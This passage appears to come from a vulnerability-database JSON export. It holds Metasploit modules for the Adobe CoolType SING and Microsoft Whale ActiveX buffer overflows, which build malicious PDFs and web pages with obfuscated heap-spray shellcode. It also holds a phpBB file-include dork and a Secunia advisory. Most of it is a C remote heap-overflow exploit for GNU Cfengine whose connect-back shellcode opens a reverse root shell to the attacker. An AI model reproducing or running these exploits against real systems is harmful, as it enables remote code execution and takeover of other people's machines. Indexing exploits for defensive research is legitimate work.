becomes first arg to memcpy (dst)\n 0xffffffff, # becomes second arg to memcpy (src)\n 0x00001000, # becomes third arg to memcpy (length)\n #0x0000258b, # ??\n #0x4d4d4a8a, # ??\n ].pack('V*')\n\n var_unescape = rand_text_alpha(rand(100) + 1)\n var_shellcode = rand_text_alpha(rand(100) + 1)\n\n var_start = rand_text_alpha(rand(100) + 1)\n\n var_s = 0x10000\n var_c = rand_text_alpha(rand(100) + 1)\n var_b = rand_text_alpha(rand(100) + 1)\n var_d = rand_text_alpha(rand(100) + 1)\n var_3 = rand_text_alpha(rand(100) + 1)\n var_i = rand_text_alpha(rand(100) + 1)\n var_4 = rand_text_alpha(rand(100) + 1)\n\n payload_buf = ''\n payload_buf << stack_data\n payload_buf << encoded_payload\n\n escaped_payload = Rex::Text.to_unescape(payload_buf)\n\n js = %Q|\nvar #{var_unescape} = unescape;\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\n#{var_b} += #{var_shellcode};\n#{var_b} += #{var_c};\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\nvar #{var_4} = new Array();\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\";\n|\n\n js\n end\n\n def random_non_ascii_string(count)\n result = \"\"\n count.times do\n result << (rand(128) + 128).chr\n end\n result\n end\n\n def io_def(id)\n \"%d 0 obj \\n\" % id\n end\n\n def io_ref(id)\n \"%d 0 R\" % id\n end\n\n\n #http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\n def n_obfu(str)\n #return str\n result = \"\"\n str.scan(/./u) do |c|\n if rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\n result << \"#%x\" % c.unpack(\"C*\")[0]\n else\n result << c\n end\n end\n result\n end\n\n\n def ascii_hex_whitespace_encode(str)\n result = \"\"\n whitespace = \"\"\n str.each_byte do |b|\n result << whitespace << \"%02x\" % b\n whitespace = \" \" * (rand(3) + 1)\n end\n result << \">\"\n end\n\n\n def make_pdf(ttf, js)\n\n #swf_name = rand_text_alpha(8 + rand(8)) + \".swf\"\n\n xref = []\n eol = \"\\n\"\n endobj = \"endobj\" << eol\n\n # Randomize PDF version?\n pdf = \"%PDF-1.5\" << eol\n pdf << \"%\" << random_non_ascii_string(4) << eol\n\n # catalog\n xref << pdf.length\n pdf << io_def(1) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Pages \") << io_ref(2) << eol\n pdf << n_obfu(\"/Type /Catalog\") << eol\n pdf << n_obfu(\"/OpenAction \") << io_ref(11) << eol\n # The AcroForm is required to get icucnv36.dll to load\n pdf << n_obfu(\"/AcroForm \") << io_ref(13) << eol\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # pages array\n xref << pdf.length\n pdf << io_def(2) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/MediaBox \") << io_ref(3) << eol\n pdf << n_obfu(\"/Resources \") << io_ref(4) << eol\n pdf << n_obfu(\"/Kids [\") << io_ref(5) << \"]\" << eol\n pdf << n_obfu(\"/Count 1\") << eol\n pdf << n_obfu(\"/Type /Pages\") << eol\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # media box\n xref << pdf.length\n pdf << io_def(3)\n pdf << \"[0 0 595 842]\" << eol\n pdf << endobj\n\n # resources\n xref << pdf.length\n pdf << io_def(4)\n pdf << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Font \") << io_ref(6) << eol\n pdf << \">>\" << eol\n pdf << endobj\n\n # page 1\n xref << pdf.length\n pdf << io_def(5) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Parent \") << io_ref(2) << eol\n pdf << n_obfu(\"/MediaBox \") << io_ref(3) << eol\n pdf << n_obfu(\"/Resources \") << io_ref(4) << eol\n pdf << n_obfu(\"/Contents [\") << io_ref(8) << n_obfu(\"]\") << eol\n pdf << n_obfu(\"/Type /Page\") << eol\n pdf << n_obfu(\">>\") << eol # end obj dict\n pdf << endobj\n\n # font\n xref << pdf.length\n pdf << io_def(6) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/F1 \") << io_ref(7) << eol\n pdf << \">>\" << eol\n pdf << endobj\n\n # ttf object\n xref << pdf.length\n pdf << io_def(7) << n_obfu(\"<<\") << eol\n pdf << n_obfu(\"/Type /Font\") << eol\n pdf << n_obfu(\"/Subtype /TrueType\") << eol\n pdf << n_obfu(\"/Name /F1\") << eol\n pdf << n_obfu(\"/BaseFont /Cinema\") << eol\n pdf << n_obfu(\"/Widths []\") << eol\n pdf << n_obfu(\"/FontDescriptor \") << io_ref(9)\n pdf << n_obfu(\"/Encoding /MacRomanEncoding\")\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # page content\n content = \"Hello World!\"\n content = \"\" +\n \"0 g\" + eol +\n \"BT\" + eol +\n \"/F1 32 Tf\" + eol +\n \"32 Tc\" + eol +\n \"1 0 0 1 32 773.872 Tm\" + eol +\n \"(\" + content + \") Tj\" + eol +\n \"ET\"\n\n xref << pdf.length\n pdf << io_def(8) << \"<<\" << eol\n pdf << n_obfu(\"/Length %s\" % content.length) << eol\n pdf << \">>\" << eol\n pdf << \"stream\" << eol\n pdf << content << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # font descriptor\n xref << pdf.length\n pdf << io_def(9) << n_obfu(\"<<\")\n pdf << n_obfu(\"/Type/FontDescriptor/FontName/Cinema\")\n pdf << n_obfu(\"/Flags %d\" % (2**2 + 2**6 + 2**17))\n pdf << n_obfu(\"/FontBBox [-177 -269 1123 866]\")\n pdf << n_obfu(\"/FontFile2 \") << io_ref(10)\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # ttf stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ttf)\n pdf << io_def(10) << n_obfu(\"<</Length %s/Filter/FlateDecode/Length1 %s>>\" % [compressed.length, ttf.length]) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n # js action\n xref << pdf.length\n pdf << io_def(11) << n_obfu(\"<<\")\n pdf << n_obfu(\"/Type/Action/S/JavaScript/JS \") + io_ref(12)\n pdf << n_obfu(\">>\") << eol\n pdf << endobj\n\n # js stream\n xref << pdf.length\n compressed = Zlib::Deflate.deflate(ascii_hex_whitespace_encode(js))\n pdf << io_def(12) << n_obfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\n pdf << \"stream\" << eol\n pdf << compressed << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n ###\n # The following form related data is required to get icucnv36.dll to load\n ###\n\n # form object\n xref << pdf.length\n pdf << io_def(13)\n pdf << n_obfu(\"<</XFA \") << io_ref(14) << n_obfu(\">>\") << eol\n pdf << endobj\n\n # form stream\n xfa = <<-EOF\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\n<config xmlns=\"http://www.xfa.org/schema/xci/2.6/\">\n<present><pdf><interactive>1</interactive></pdf></present>\n</config>\n<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.6/\">\n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\">\n<pageSet></pageSet>\n</subform></template></xdp:xdp>\nEOF\n\n xref << pdf.length\n pdf << io_def(14) << n_obfu(\"<</Length %s>>\" % xfa.length) << eol\n pdf << \"stream\" << eol\n pdf << xfa << eol\n pdf << \"endstream\" << eol\n pdf << endobj\n\n ###\n # end form stuff for icucnv36.dll\n ###\n\n\n # trailing stuff\n xrefPosition = pdf.length\n pdf << \"xref\" << eol\n pdf << \"0 %d\" % (xref.length + 1) << eol\n pdf << \"0000000000 65535 f\" << eol\n xref.each do |index|\n pdf << \"%010d 00000 n\" % index << eol\n end\n\n pdf << \"trailer\" << eol\n pdf << n_obfu(\"<</Size %d/Root \" % (xref.length + 1)) << io_ref(1) << \">>\" << eol\n\n pdf << \"startxref\" << eol\n pdf << xrefPosition.to_s() << eol\n\n pdf << \"%%EOF\" << eol\n pdf\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/adobe_cooltype_sing.rb"}, {"lastseen": "2019-12-02T07:59:58", "bulletinFamily": "exploit", "description": "This module exploits a stack buffer overflow in Microsoft Whale Intelligent Application Gateway Whale Client. When sending an overly long string to CheckForUpdates() method of WhlMgr.dll (3.1.502.64) an attacker may be able to execute arbitrary code.\n", "modified": "2017-10-05T21:44:36", "published": "2009-04-15T21:38:50", "id": "MSF:EXPLOIT/WINDOWS/BROWSER/MSWHALE_CHECKFORUPDATES", "href": "", "type": "metasploit", "title": "Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = NormalRanking\n\n include Msf::Exploit::Remote::HttpServer::HTML\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft Whale Intelligent Application Gateway ActiveX Control Buffer Overflow',\n 'Description' => %q{\n This module exploits a stack buffer overflow in Microsoft Whale Intelligent Application\n Gateway Whale Client. When sending an overly long string to CheckForUpdates()\n method of WhlMgr.dll (3.1.502.64) an attacker may be able to execute\n arbitrary code.\n },\n 'License' => MSF_LICENSE,\n 'Author' => [ 'MC' ],\n 'References' =>\n [\n [ 'CVE', '2007-2238' ],\n [ 'OSVDB', '53933'],\n [ 'URL', 'http://technet.microsoft.com/en-us/library/dd282918.aspx' ],\n ],\n 'DefaultOptions' =>\n {\n 'EXITFUNC' => 'process',\n },\n 'Payload' =>\n {\n 'Space' => 1024,\n 'BadChars' => \"\\x00\",\n },\n 'Platform' => 'win',\n 'Targets' =>\n [\n [ 'Windows XP SP0-SP3 / Windows Vista / IE 6.0 SP0-SP2 / IE 7', { 'Ret' => '' } ]\n ],\n 'DisclosureDate' => 'Apr 15 2009',\n 'DefaultTarget' => 0))\n end\n\n def autofilter\n false\n end\n\n def check_dependencies\n use_zlib\n end\n\n def on_request_uri(cli, request)\n # Re-generate the payload.\n return if ((p = regenerate_payload(cli)) == nil)\n\n # fluff..\n fluff = rand_text_english(rand(20) + 1)\n\n # Encode the shellcode.\n shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))\n\n # Set the return.\n ret = Rex::Text.uri_encode(Metasm::Shellcode.assemble(Metasm::Ia32.new, \"or cl,[edx]\").encode_string * 2)\n\n js = %Q|\n try {\n var evil_string = \"\";\n var index;\n var vulnerable = new ActiveXObject('ComponentManager.Installer.1');\n var my_unescape = unescape;\n var shellcode = '#{shellcode}';\n #{js_heap_spray}\n sprayHeap(my_unescape(shellcode), 0x0a0a0a0a, 0x40000);\n for (index = 0; index < 15000; index++) {\n evil_string = evil_string + my_unescape('#{ret}');\n }\n vulnerable.CheckForUpdates(evil_string,'#{fluff}');\n } catch( e ) { window.location = 'about:blank' ; }\n |\n\n opts = {\n 'Strings' => true,\n 'Symbols' => {\n 'Variables' => [\n 'vulnerable',\n 'shellcode',\n 'my_unescape',\n 'index',\n 'evil_string',\n ]\n }\n }\n js = ::Rex::Exploitation::ObfuscateJS.new(js, opts)\n js.update_opts(js_heap_spray.opts)\n js.obfuscate(memory_sensitive: true)\n content = %Q|<html>\n<body>\n<script><!--\n#{js}\n//</script>\n</body>\n</html>\n|\n\n print_status(\"Sending #{self.name}\")\n\n # Transmit the response to the client\n send_response_html(cli, content)\n\n # Handle the payload\n handler(cli)\n end\nend\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/windows/browser/mswhale_checkforupdates.rb"}], "securityvulns": [{"lastseen": "2018-08-31T11:09:21", "bulletinFamily": "software", "description": "PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc.", "modified": "2006-11-22T00:00:00", "published": "2006-11-22T00:00:00", "id": "SECURITYVULNS:VULN:6847", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:6847", "title": "Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:20", "bulletinFamily": "software", "description": "\r\n\r\n===============================================================================\r\n=Bug was found in the part of phpBB\r\n=\r\n=Dork : "Powered by Dimension"\r\n=\r\n=Expl : includes/functions.php?phpbb_root_path=\r\n=\r\n=Source Code : http://www.xs4all.nl/~hkicken/plusxl20/phpbb2_plusxl_20_272.zip\r\n=\r\n=Found by : Rendy & BlueSpy\r\n= IRC.ALLINDO.NET\r\n===============================================================================\r\n\r\n\r\n\r\n", "modified": "2006-11-22T00:00:00", "published": "2006-11-22T00:00:00", "id": "SECURITYVULNS:DOC:15167", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:15167", "title": "PhpBB Module Dimension Remote File Include", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:10:12", "bulletinFamily": "software", "description": "\r\n----------------------------------------------------------------------\r\n\r\nWant a new IT Security job?\r\n\r\nVacant positions at Secunia:\r\nhttp://secunia.com/secunia_vacancies/\r\n\r\n----------------------------------------------------------------------\r\n\r\nTITLE:\r\nPlans Cross-Site Scripting and Password Disclosure Vulnerabilities\r\n\r\nSECUNIA ADVISORY ID:\r\nSA15167\r\n\r\nVERIFY ADVISORY:\r\nhttp://secunia.com/advisories/15167/\r\n\r\nCRITICAL:\r\nModerately critical\r\n\r\nIMPACT:\r\nCross Site Scripting, Exposure of sensitive information\r\n\r\nWHERE:\r\n>From remote\r\n\r\nSOFTWARE:\r\nPlans 6.x\r\nhttp://secunia.com/product/5021/\r\n\r\nDESCRIPTION:\r\nSome vulnerabilities have been reported in Plans, which can be\r\nexploited by malicious people to conduct cross-site scripting attacks\r\nor gain knowledge of sensitive information.\r\n\r\n1) Input passed to various unspecified parameters is not properly\r\nsanitised before being returned to users. This can be exploited to\r\nexecute arbitrary HTML and script code in a user's browser session in\r\ncontext of a vulnerable site.\r\n\r\n2) An unspecified error can be exploited to gain knowledge of the\r\nMySQL password.\r\n\r\nSOLUTION:\r\nUpdate to version 6.7.1 or later.\r\n\r\nPROVIDED AND/OR DISCOVERED BY:\r\n1) NoseyNick\r\n2) Gary Lewis\r\n\r\n----------------------------------------------------------------------\r\n\r\nAbout:\r\nThis Advisory was delivered by Secunia as a free service to help\r\neverybody keeping their systems up to date against the latest\r\nvulnerabilities.\r\n\r\nSubscribe:\r\nhttp://secunia.com/secunia_security_advisories/\r\n\r\nDefinitions: (Criticality, Where etc.)\r\nhttp://secunia.com/about_secunia_advisories/\r\n\r\n\r\nPlease Note:\r\nSecunia recommends that you verify all advisories you receive by\r\nclicking the link.\r\nSecunia NEVER sends attached files with advisories.\r\nSecunia does not advise people to install third party patches, only\r\nuse those supplied by the vendor.\r\n", "modified": "2005-05-03T00:00:00", "published": "2005-05-03T00:00:00", "id": "SECURITYVULNS:DOC:8525", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:8525", "title": "[SA15167] Plans Cross-Site Scripting and Password Disclosure Vulnerabilities", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}], "zdt": [{"lastseen": "2018-01-10T11:25:16", "bulletinFamily": "exploit", "description": "Exploit for linux platform in category remote exploits", "modified": "2005-02-20T00:00:00", "published": "2005-02-20T00:00:00", "id": "1337DAY-ID-8525", "href": "https://0day.today/exploit/description/8525", "type": "zdt", "title": "GNU Cfengine 2.17p1 RSA Authentication Heap Overflow Exploit", "sourceData": "============================================================\r\nGNU Cfengine 2.17p1 RSA Authentication Heap Overflow Exploit\r\n============================================================\r\n\r\n/* removed line 54 /str0ke */\r\n\r\n/* _ ________ _____ ______\r\n*\r\n* cfengine rsa heap remote exploit part of PTjob project / \\ / \"fuck mm\"\r\n* by jsk:exworm(http://exworm.hostrocket.com) \\/\r\n* bug found by core\r\n* yep ta mei dayong ..hehe..so pub it..\r\n* my home: www.ph4nt0m.org\r\n* GT: emm.oyxin.seal.ava.haggis.b_root.more..\r\n* No girl No money No jop...\r\n* bash-2.05b# ./cf_0day -t 1 -h 192.168.31.23\r\n* cfengine rsa heap remote exploit ....s\r\n* --------------------------------------------------(need money.to..fk..girl..)\r\n* [+] lisntener...\r\n* [+] Connected, sending code...\r\n* [+] Ret: 0x0819f03e\r\n* [+] Got: 0x0811a590\r\n* [+] ownedbyOseen!\r\n* -----------------------------------------------------------\r\n* Linux ns2.autson.com 2.4.18-3 #1 Thu Apr 18 07:37:53 EDT 2002 i686 unknown\r\n* uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10\r\n*(wheel)\r\n*\r\n*\r\n*/\r\n\r\n#include <stdio.h>\r\n#include <stdarg.h>\r\n#include <stdlib.h>\r\n#include <netdb.h>\r\n#include <net/if.h>\r\n#include <netinet/in.h>\r\n#include <sys/types.h>\r\n#include <sys/socket.h>\r\n#include <sys/ioctl.h>\r\n#include <sys/time.h>\r\n#include <netinet/in.h>\r\n#include <getopt.h>\r\n#include <unistd.h>\r\n#include <string.h>\r\n#include <arpa/inet.h>\r\n#include <errno.h>\r\n#include <linux/sockios.h>\r\n\r\n#define BUF 1024\r\n\r\nstruct {\r\n char *distro;\r\n char *type;\r\n unsigned long ret;\r\n unsigned long got;\r\n\r\n} targets[] = { /*got is free of rsafree() ,get it by yourself to own more machine ;) */\r\n { \"Redhat 7.3 \", \"cfengine 2.1.7p1 \",0x0819f03e , 0x0811a590 },\r\n { \"Redhat 7.2 \", \"cfengine 2.17p1 \", 0x080d1c78, 0x0806d0e3 },\r\n { \"Redhat 7.1 \", \"cfengine 2.17p1\", 0x080d11e0, 0x082bc090 },\r\n { \"Crash \", \"(All platforms) \", 0x42424242, 0x41414141 },\r\n};\r\nchar linux_connect_back[] = /* connect back 45295 */\r\n\"\\x31\\xc0\\x31\\xdb\\x31\\xc9\\x51\\xb1\"\r\n \"\\x06\\x51\\xb1\\x01\\x51\\xb1\\x02\\x51\"\r\n \"\\x89\\xe1\\xb3\\x01\\xb0\\x66\\xcd\\x80\"\r\n \"\\x89\\xc2\\x31\\xc0\\x31\\xc9\\x51\\x51\"\r\n \"\\x68\\x41\\x42\\x43\\x44\\x66\\x68\\xb0\"\r\n \"\\xef\\xb1\\x02\\x66\\x51\\x89\\xe7\\xb3\"\r\n \"\\x10\\x53\\x57\\x52\\x89\\xe1\\xb3\\x03\"\r\n \"\\xb0\\x66\\xcd\\x80\\x31\\xc9\\x39\\xc1\"\r\n \"\\x74\\x06\\x31\\xc0\\xb0\\x01\\xcd\\x80\"\r\n \"\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xcd\\x80\"\r\n \"\\x31\\xc0\\xb0\\x3f\\x89\\xd3\\xb1\\x01\"\r\n \"\\xcd\\x80\\x31\\xc0\\xb0\\x3f\\x89\\xd3\"\r\n \"\\xb1\\x02\\xcd\\x80\\x31\\xc0\\x31\\xd2\"\r\n \"\\x50\\x68\\x6e\\x2f\\x73\\x68\\x68\\x2f\"\r\n \"\\x2f\\x62\\x69\\x89\\xe3\\x50\\x53\\x89\"\r\n \"\\xe1\\xb0\\x0b\\xcd\\x80\\x31\\xc0\\xb0\"\r\n \"\\x01\\xcd\\x80\";\r\nint sock;\r\nvoid usage();\r\nvoid shell();\r\n\r\nvoid\r\nusage(char *prog)\r\n{\r\n\r\n fprintf(stderr,\"Usage: %s -t [-pah]\\n\",prog);\r\n fprintf(stderr,\"-t version Linux version.\\n\");\r\n fprintf(stderr,\"-h target The host to attack.\\n\");\r\n fprintf(stderr,\"-a password Default password is \\\"sorry no password. \\\".\\n\");\r\n fprintf(stderr,\"-p port Default port is 5803.\\n\\n\");\r\n}\r\n\r\nint\r\nopenhost(char *host,int port)\r\n{\r\n struct sockaddr_in addr;\r\n struct hostent *he;\r\n\r\n he=gethostbyname(host);\r\n\r\n if (he==NULL) return -1;\r\n sock=socket(AF_INET, SOCK_STREAM, getprotobyname(\"tcp\")->p_proto);\r\n if (sock==-1) return -1;\r\n\r\n memcpy(&addr.sin_addr, he->h_addr, he->h_length);\r\n\r\n addr.sin_family=AF_INET;\r\n addr.sin_port=htons(port);\r\n\r\n if(connect(sock, (struct sockaddr *)&addr, sizeof(addr)) == -1)\r\n sock=-1;\r\n return sock;\r\n}\r\n\r\nvoid\r\nshell(int sock)\r\n{\r\n fd_set fd_read;\r\n char buff[1024], *cmd=\"unset HISTFILE; /bin/uname -a;/usr/bin/id; echo '*** oseen are chinese...'\\n\";\r\n int n;\r\n\r\n FD_ZERO(&fd_read);\r\n FD_SET(sock, &fd_read);\r\n FD_SET(0, &fd_read);\r\n\r\n send(sock, cmd, strlen(cmd), 0);\r\n\r\n while(1) {\r\n FD_SET(sock, &fd_read);\r\n FD_SET(0, &fd_read);\r\n\r\n if (select(sock+1, &fd_read, NULL, NULL, NULL) < 0) break;\r\n\r\n if (FD_ISSET(sock, &fd_read)) {\r\n if ((n = recv(sock, buff, sizeof(buff), 0)) < 0){\r\n fprintf(stderr, \"[+] EOF\\n\");\r\n exit(2);\r\n }\r\n\r\n if (write(1, buff, n) <0) break;\r\n }\r\n\r\n if (FD_ISSET(0, &fd_read)) {\r\n if ((n = read(0, buff, sizeof(buff))) < 0){\r\n fprintf(stderr,\"[+] EOF\\n\");\r\n exit(2);\r\n }\r\n\r\n if (send(sock, buff, n, 0) < 0) break;\r\n }\r\n }\r\n\r\n fprintf(stderr,\"[+] Connection lost.\\n\\n\");\r\n exit(0);\r\n}\r\n\r\nunsigned char\r\n*get_my_ip_addr(int sockfd, struct ifreq *ifr)\r\n{\r\n struct sockaddr_in sin;\r\n char *b = (char *) malloc(4);\r\n\r\n if (ioctl(sockfd ,SIOCGIFADDR,ifr) < 0) {\r\n fprintf(stderr, \"Unable to get the local IP Address, use -d.\\n\");\r\n exit(1);\r\n }\r\n\r\n memcpy(&sin, &ifr->ifr_addr, sizeof(struct sockaddr_in));\r\n memcpy(b, (char *) &sin.sin_addr.s_addr, 4);\r\n return b;\r\n}\r\n\r\nint\r\nmain (int argc,char *argv[])\r\n{\r\n char buf1[512];\r\n char buf2[512];\r\n char host[256];\r\n char pass[256]=\"changeme\";\r\n char data;\r\n\r\n int type= 0;\r\n int c=0;\r\n int port=8001;\r\n char device[256] = \"eth0\";\r\n unsigned char *ptr;\r\n\r\n struct hostent *hp;\r\n struct sockaddr_in sin_listener;\r\n struct ifreq ifr;\r\n struct timeval timeout;\r\n\r\n fd_set fdread;\r\n\r\n int delay = 12;\r\n int i = 0;\r\n int mode = 0;\r\n int local_port = 0;\r\n int opt = 0;\r\n int ret = 0;\r\n int sin_len = sizeof (struct sockaddr_in);\r\n int sock = 0;\r\n int sock2 = 0;\r\n int sockd = 0;\r\n int listener = 0;\r\n int time_out = 4;\r\n int tmp = 0;\r\n\r\n srand(getpid());\r\n\r\n fprintf(stdout,\"cfengine rsa heap remote exploit ....s\\n\");\r\n fprintf(stdout,\"--------------------------------------------------(need money.to..fk..girl..)\\n\");\r\n\r\n while((c=getopt(argc,argv,\"h:p:a:t:\")) !=EOF)\r\n {\r\n switch(c)\r\n {\r\n case 'p':\r\n port=atoi(optarg);\r\n if ((port <= 0) || (port > 65535)) {\r\n fprintf(stderr,\"Invalid port.\\n\\n\");\r\n exit(1);\r\n }\r\n break;\r\n case 'a':\r\n memset(pass,0x0,sizeof(pass));\r\n strncpy(pass,optarg,sizeof(pass) - 1);\r\n break;\r\n case 't':\r\n type = atoi(optarg);\r\n if (type == 0 || type > sizeof(targets) / 28) {\r\n for(i = 0; i < sizeof(targets) / 28; i++)\r\n fprintf(stderr, \"%02d. %s - %s [0x%08x - 0x%08x]\\n\",\r\n i + 1, targets[i].distro, targets[i].type, targets[i].ret, targets[i].got);\r\n return -1;\r\n }\r\n break;\r\n case 'h':\r\n memset(host,0x0,sizeof(host));\r\n strncpy(host,optarg,sizeof(host) - 1);\r\n break;\r\n\r\n default:\r\n usage(argv[0]);\r\n exit(1);\r\n break;\r\n }\r\n }\r\n\r\n timeout.tv_sec = time_out;\r\n timeout.tv_usec = 0;\r\n\r\n if (strlen(host) == 0) {\r\n usage(argv[0]);\r\n exit(1);\r\n }\r\n sock=openhost(host, 5308);\r\n\r\n if (sock==-1) {\r\n fprintf(stderr,\"- Unable to connect.\\n\\n\");\r\n exit(1);\r\n }\r\n\r\n strncpy(ifr.ifr_name, device, 15);\r\n\r\n if ((sockd = socket(AF_INET, SOCK_DGRAM, 17)) < 0) {\r\n fprintf(stderr, \"socket() error.\\n\");\r\n return -1;\r\n }\r\n\r\n if ((listener = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {\r\n fprintf(stderr, \"socket() error.\\n\");\r\n return -1;\r\n }\r\n\r\n ptr = get_my_ip_addr(sockd, &ifr);\r\n memcpy(&sin_listener.sin_addr.s_addr, ptr, 4);\r\n\r\n sin_listener.sin_family = AF_INET;\r\n memset(&sin_listener.sin_zero, 0x00, 8);\r\n\r\n while(1) {\r\n local_port = local_port = 45295;\r\n sin_listener.sin_port = htons(local_port);\r\n if (!bind(listener, (struct sockaddr *) &sin_listener, sin_len)) break;\r\n }\r\n\r\n listen(listener, 1);\r\n fprintf(stdout, \"[+] lisntener...\\n\");\r\n linux_connect_back[33] = (unsigned int) *(ptr + 0);\r\n linux_connect_back[34] = (unsigned int) *(ptr + 1);\r\n linux_connect_back[35] = (unsigned int) *(ptr + 2);\r\n linux_connect_back[36] = (unsigned int) *(ptr + 3);\r\n\r\n memset(buf2, 0x0, sizeof(buf2));\r\n memset(buf1, 0x90, sizeof(buf1));\r\n\r\n for(i=0;i < strlen(linux_connect_back); i++) buf1[i+50] = linux_connect_back[i];\r\n\r\n buf1[0] = (0x41414141 & 0x000000ff);\r\n buf1[1] = (0x41414141 & 0x0000ff00) >> 8;\r\n buf1[2] = (0x41414141 & 0x00ff0000) >> 16;\r\n buf1[3] = (0x41414141 & 0xff000000) >> 24;\r\n\r\n buf1[4] = (0x58585858 & 0x000000ff);\r\n buf1[5] = (0x58585858 & 0x0000ff00) >> 8;\r\n buf1[6] = (0x58585858 & 0x00ff0000) >> 16;\r\n buf1[7] = (0x58585858 & 0xff000000) >> 24;\r\n\r\n buf1[8] = (0xfffffffc & 0x000000ff);\r\n buf1[9] = (0xfffffffc & 0x0000ff00) >> 8;\r\n buf1[10] = (0xfffffffc & 0x00ff0000) >> 16;\r\n buf1[11] = (0xfffffffc & 0xff000000) >> 24;\r\n\r\n buf1[12] = (0xffffffff & 0x000000ff);\r\n buf1[13] = (0xffffffff & 0x0000ff00) >> 8;\r\n buf1[14] = (0xffffffff & 0x00ff0000) >> 16;\r\n buf1[15] = (0xffffffff & 0xff000000) >> 24;\r\n\r\n buf1[16] = (targets[type - 1].got -12 & 0x000000ff);\r\n buf1[17] = (targets[type - 1].got -12 & 0x0000ff00) >> 8;\r\n buf1[18] = (targets[type - 1].got -12 & 0x00ff0000) >> 16;\r\n buf1[19] = (targets[type - 1].got -12 & 0xff000000) >> 24;\r\n\r\n buf1[20] = (targets[type - 1].ret & 0x000000ff);\r\n buf1[21] = (targets[type - 1].ret & 0x0000ff00) >> 8;\r\n buf1[22] = (targets[type - 1].ret & 0x00ff0000) >> 16;\r\n buf1[23] = (targets[type - 1].ret & 0xff000000) >> 24;\r\n\r\n for(i = 0; i < 300 - sizeof(linux_connect_back) -80; i+=2)\r\n {\r\n buf1[i + 24] = 0x7f;\r\n buf1[i + 25] = 0xeb;\r\n }\r\n for(; i < 300 - sizeof(linux_connect_back) - 1; i++)\r\n buf1[i + 24] = 0x90;\r\n strcpy(buf1 + i + 24, linux_connect_back);\r\n buf1[i + 24+ sizeof(linux_connect_back) - 1] = '\\n';\r\n buf1[i + 25 + sizeof(linux_connect_back) - 1] = '\\0';\r\n\r\n sprintf(buf2, \"k0000023CAUTH HARE KRISHNA HAREk0003000SAUTH n00000010 00001000%s\\r\\n\", buf1);\r\n\r\n fprintf(stdout, \"Connected, sending code...\\n\");\r\n fprintf(stdout, \"[+] Ret: 0x%08x\\n\", targets[type - 1].ret);\r\n fprintf(stdout, \"[+] Got: 0x%08x\\n\", targets[type - 1].got);\r\nwhile(1) {\r\n write(sock, buf2, strlen(buf2));\r\n close(sock);\r\n sleep(2);\r\n FD_ZERO(&fdread);\r\n FD_SET(listener, &fdread);\r\n\r\n timeout.tv_sec = time_out;\r\n timeout.tv_usec = 0;\r\n\r\n while(1) {\r\n\r\n ret = select(FD_SETSIZE, &fdread, NULL, NULL, &timeout);\r\n\r\n if (ret < 0) {\r\n close(sock);\r\n close(listener);\r\n fprintf(stderr, \"select() error.\\n\");\r\n return -1;\r\n }\r\n\r\n if (ret == 0) {\r\n fprintf(stderr, \"[+] Failed, waiting %d seconds.\\n\"\r\n \"[+] Use ctrl-c to abort.\\n\", delay);\r\n sleep(delay);\r\n break;\r\n }\r\n\r\n 